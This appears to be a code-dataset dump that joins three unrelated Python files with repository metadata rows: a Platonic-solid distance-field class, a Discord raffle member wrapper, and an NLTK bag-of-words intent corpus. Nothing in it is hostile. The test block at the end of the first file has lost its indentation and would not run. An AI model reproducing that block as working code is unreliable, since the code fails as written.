] | 6 | 2020-02-12T18:19:23.000Z | 2021-12-16T11:00:32.000Z | from compas.geometry import Point, Vector, Frame
from compas.geometry import matrix_from_frame
from compas.geometry import matrix_inverse
from math import sqrt, tan, pi
class PlatonicSolid(object):
    """A platonic solid, defined by radius and type.

    Parameters
    ----------
    radius : float
        The radius of the solid.
    type : int
        The type of solid (tetrahedron, octahedron, dodecahedron, icosahedron)

    Examples
    --------
    >>> ...

    References
    ----------
    adapted from SDF library by Michael Fogleman [1]_
    ..[1] https://github.com/fogleman/sdf/blob/main/sdf/d3.py#L283
    """
    def __init__(self, radius, type=0, frame=None):
        self.radius = radius
        self.type = type
        self.frame = frame or Frame.worldXY()
        self.inversetransform = matrix_inverse(matrix_from_frame(self.frame))
        self.sqrt3 = sqrt(3)
        self.tan30 = tan(pi/6)
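    # type codes: 0 = tetrahedron, 1 = octahedron, 2 = dodecahedron, 3 = icosahedron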
    def get_distance(self, point):
        if not isinstance(point, Point):
            point = Point(*point)

        point.transform(self.inversetransform)
        x, y, z = point

        # Tetrahedron
        if self.type == 0:
            return (max(abs(x + y) - z, abs(x - y) + z) - self.radius) / self.sqrt3
        # Octahedron
        elif self.type == 1:
            s = abs(x) + abs(y) + abs(z)
            return (s - self.radius) * self.tan30
        # Dodecahedron
        elif self.type == 2:
            v = Vector((1 + sqrt(5)) / 2, 1, 0)
            v.unitize()
            px = abs(x / self.radius)
            py = abs(y / self.radius)
            pz = abs(z / self.radius)
            p = Vector(px, py, pz)
            a = p.dot(v)
            b = p.dot(Vector(v.z, v.x, v.y))
            c = p.dot(Vector(v.y, v.z, v.x))
            q = (max(max(a, b), c) - v.x) * self.radius
            return q
        # Icosahedron
        elif self.type == 3:
            r = self.radius * 0.8506507174597755
            v = Vector((sqrt(5) + 3) / 2, 1, 0)
            v.unitize()
            w = sqrt(3) / 3
            px = abs(x / r)
            py = abs(y / r)
            pz = abs(z / r)
            p = Vector(px, py, pz)
            a = p.dot(v)
            b = p.dot(Vector(v.z, v.x, v.y))
            c = p.dot(Vector(v.y, v.z, v.x))
            d = p.dot([w, w, w]) - v.x
            q = max(max(max(a, b), c) - v.x, d) * r
            return q
        else:
            return 0
    def get_distance_numpy(self, x, y, z):
        import numpy as np

        p = np.array([x, y, z, 1], dtype=object)
        xt, yt, zt, _ = np.dot(self.inversetransform, p)

        if self.type == 0:
            return (np.maximum(np.abs(xt + yt) - zt, np.abs(xt - yt) + zt) - self.radius) / self.sqrt3
        elif self.type == 1:
            return ((np.abs(xt) + np.abs(yt) + np.abs(zt)) - self.radius) * self.tan30
        elif self.type == 2:
            # note the parenthesisation: (1 + sqrt(5)) / 2, matching the scalar version above
            v = np.array([((1 + np.sqrt(5)) / 2, 1, 0)])
            v = np.reshape(np.tile(v / np.linalg.norm(v), xt.size), (*xt.shape, 3))
            p = np.empty((*xt.shape, 3))
            p[:, :, :, 0], p[:, :, :, 1], p[:, :, :, 2] = np.abs(xt / self.radius), np.abs(yt / self.radius), np.abs(zt / self.radius)
            return (np.maximum(np.maximum(np.sum(p * v, axis=3), np.sum(p * np.roll(v, 1, axis=3), axis=3)),
                               np.sum(p * np.roll(v, 2, axis=3), axis=3)) - v[:, :, :, 0]) * self.radius
        elif self.type == 3:
            r = self.radius * 0.8506507174597755
            v = np.array([(sqrt(5) + 3) / 2, 1, 0])
            v = np.reshape(np.tile(v / np.linalg.norm(v), xt.size), (*xt.shape, 3))
            w = np.full((*xt.shape, 3), np.sqrt(3) / 3)
            p = np.empty((*xt.shape, 3))
            p[:, :, :, 0], p[:, :, :, 1], p[:, :, :, 2] = np.abs(xt / r), np.abs(yt / r), np.abs(zt / r)
            return np.maximum(np.maximum(np.maximum(np.sum(p * v, axis=3), np.sum(p * np.roll(v, 1, axis=3), axis=3)),
                                         np.sum(p * np.roll(v, 2, axis=3), axis=3)) - v[:, :, :, 0],
                              np.sum(p * w, axis=3) - v[:, :, :, 0]) * r
        else:
            return np.zeros((*xt.shape,))
if __name__=="__main__":
import matplotlib.pyplot as plt
import numpy as np
import time
p = PlatonicSolid(10.0, 0, frame=Frame((1, 2, 3), (1, 0.3, 0.1), (-0.4, 1, 0.3)))
x, y, z = np.ogrid[-30:30:60j, -30:30:60j, -30:30:60j]
start = time.time()
d = p.get_distance_numpy(x, y, z)
end = time.time()
print(end-start)
#m = np.tanh(d[:, :, 30].T)
m = d[:, :, 30].T
#plt.imshow(m, cmap='Greys', interpolation='nearest')
plt.imshow(m)
plt.colorbar()
plt.axis('equal')
plt.show()
# p = PlatonicSolid(10.0, 3)
for y in range(-15, 15):
s = ''
for x in range(-30, 30):
d = p.get_distance((x * 0.5, -y, 0))
if d < 0:
s += 'x'
else:
s += '.'
print(s) | 33.234899 | 119 | 0.476171 | 741 | 4,952 | 3.147099 | 0.190283 | 0.068611 | 0.009005 | 0.006861 | 0.358491 | 0.286021 | 0.23199 | 0.215695 | 0.215695 | 0.215695 | 0 | 0.052179 | 0.342084 | 4,952 | 149 | 120 | 33.234899 | 0.663597 | 0.1042 | 0 | 0.306931 | 0 | 0 | 0.003434 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029703 | false | 0 | 0.079208 | 0 | 0.217822 | 0.019802 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa0b758e79ae5904caff2deec173d14f3c451143 | 911 | py | Python | raffle/utils/safety.py | OofChair/KreusadaCogs | ed35260830731bf9bf87333c07ae759c59eee509 | [
"MIT"
] | null | null | null | raffle/utils/safety.py | OofChair/KreusadaCogs | ed35260830731bf9bf87333c07ae759c59eee509 | [
"MIT"
] | null | null | null | raffle/utils/safety.py | OofChair/KreusadaCogs | ed35260830731bf9bf87333c07ae759c59eee509 | [
"MIT"
] | null | null | null | from typing import Literal
import discord
from .exceptions import InvalidArgument
from .formatting import curl
class RaffleSafeMember(object):
    """Used for formatting `discord.Member` attributes safely."""

    def __init__(self, member: discord.Member, obj: Literal["winner", "user"]):
        self.name = member.name
        self.mention = member.mention
        self.id = member.id
        self.display_name = member.display_name
        self.discriminator = member.discriminator
        self.name_and_discriminator = str(member)
        self.obj = obj

    def __str__(self):
        return self.name

    def __getattr__(self, attr):
        curled = curl(f"{self.obj}.{attr}")
        quote = lambda x: f'"{x}"'
        exc = "{} is not valid! {} has no attribute {}.".format(
            curled, self.obj.capitalize(), quote(attr)
        )
        raise InvalidArgument(exc)
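# For example, a raffle description using {winner.name} resolves normally, while an
# unknown attribute such as {winner.foo} raises InvalidArgument (with a readable
# message) instead of a bare AttributeError.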
| 28.46875 | 79 | 0.63337 | 107 | 911 | 5.242991 | 0.448598 | 0.049911 | 0.032086 | 0.042781 | 0.057041 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.243688 | 911 | 31 | 80 | 29.387097 | 0.814224 | 0.060373 | 0 | 0 | 0 | 0 | 0.104706 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136364 | false | 0 | 0.181818 | 0.045455 | 0.409091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
fa0c05429cdb05791acfc025e965a83e86abb9ec | 4,193 | py | Python | dsbot/corpus/bag_words.py | jefrysastre/dsbot | 5afbfc34b2846f13d118df70160513935331983d | [
"MIT"
] | null | null | null | dsbot/corpus/bag_words.py | jefrysastre/dsbot | 5afbfc34b2846f13d118df70160513935331983d | [
"MIT"
] | null | null | null | dsbot/corpus/bag_words.py | jefrysastre/dsbot | 5afbfc34b2846f13d118df70160513935331983d | [
"MIT"
] | null | null | null |
import pickle
import nltk
import re
import numpy as np
from string import punctuation
# English
from nltk.stem.lancaster import LancasterStemmer
from nltk.stem.rslp import RSLPStemmer
class BagOfWordsCorpus:
    def __init__(self, save_path, commands, verbose, force_training=False):
        self.verbose = verbose
        self.save_path = save_path

        # English
        # self.stemmer = LancasterStemmer()
        # Portuguese
        self.stemmer = RSLPStemmer()
        self.stopwords = set(nltk.corpus.stopwords.words('portuguese') + list(punctuation))
        self.commands = commands

        if force_training:
            self.load_corpus()
        else:
            try:
                with open(save_path, "rb") as f:
                    self.words, self.labels, self.training, self.output = pickle.load(f)
            except:
                self.load_corpus()
    def load_corpus(self):
        words = []
        labels = []
        docs_x = []
        docs_y = []

        # for intent in data["intents"]:
        for key, command in self.commands.items():
            for pattern in command.patterns:
                wrds = nltk.word_tokenize(pattern)
                wrds = [word for word in wrds if word not in self.stopwords]
                wrds = [self.stemmer.stem(w.lower()) for w in wrds]
                words.extend(wrds)
                docs_x.append(wrds)
                docs_y.append(command.tag)

            if command.tag not in labels:
                labels.append(command.tag)

        words = sorted(list(set(words)))
        labels = sorted(labels)

        training = []
        output = []
        out_empty = [0 for _ in range(len(labels))]

        for x, wrds in enumerate(docs_x):
            bag = []
            for w in words:
                if w in wrds:
                    bag.append(1)
                else:
                    bag.append(0)

            output_row = out_empty[:]
            output_row[labels.index(docs_y[x])] = 1

            training.append(bag)
            output.append(output_row)

        training = np.array(training)
        output = np.array(output)

        self.words = words
        self.labels = labels
        self.training = training
        self.output = output

        with open(self.save_path, "wb") as f:
            pickle.dump((words, labels, training, output), f)
    def encode(self, sentence):
        bag = [0 for _ in range(len(self.words))]

        wrds = nltk.word_tokenize(sentence)
        wrds = [word for word in wrds if word not in self.stopwords]
        wrds = [self.stemmer.stem(w.lower()) for w in wrds]
        corrected_input = wrds

        # correct the user's input spelling when the input was typed
        # corrected_input = []
        # for userinput_word in s_words:
        #     # spell checking
        #     # userinput_word = reduce_lengthening(userinput_word)
        #     correct_word = spelling.correction(userinput_word)
        #     corrected_input.append(correct_word)

        if self.verbose:
            print("User message corrected to: {0}".format(corrected_input))

        for se in wrds:
            for i, w in enumerate(self.words):
                if w == se:
                    bag[i] = 1

        return np.array(bag)
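    # e.g. with self.words == ['ajud', 'grafic'] (hypothetical stems), encode("me ajude")
    # would return array([1, 0]): a 1 for every vocabulary stem present in the sentence.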
    def reduce_lengthening(self, word):
        pattern = re.compile(r"(.)\1{2,}")
        return pattern.sub(r"\1\1", word)
    def add(self, sentence, tag):
        try:
            # read the dataset (the same 4-tuple that load_corpus writes)
            with open(self.save_path, "rb") as f:
                self.words, self.labels, self.training, self.output = pickle.load(f)

            x = self.encode(sentence)

            # find the phrase in the dataset
            if any(np.array_equal(x, row) for row in self.training):
                return

            y = [0 for _ in range(len(self.labels))]
            y[self.labels.index(tag)] = 1

            self.training = np.vstack([self.training, x])
            self.output = np.vstack([self.output, y])

            # add the current phrase to the dataset
            with open(self.save_path, "wb") as f:
                pickle.dump((self.words, self.labels, self.training, self.output), f)
        except Exception as e:
            print(e) | 29.118056 | 91 | 0.544717 | 492 | 4,193 | 4.552846 | 0.254065 | 0.021429 | 0.021429 | 0.029464 | 0.196429 | 0.176786 | 0.136607 | 0.109821 | 0.109821 | 0.071429 | 0 | 0.004826 | 0.357501 | 4,193 | 144 | 92 | 29.118056 | 0.826652 | 0.108991 | 0 | 0.108696 | 0 | 0 | 0.023131 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054348 | false | 0 | 0.076087 | 0 | 0.173913 | 0.021739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |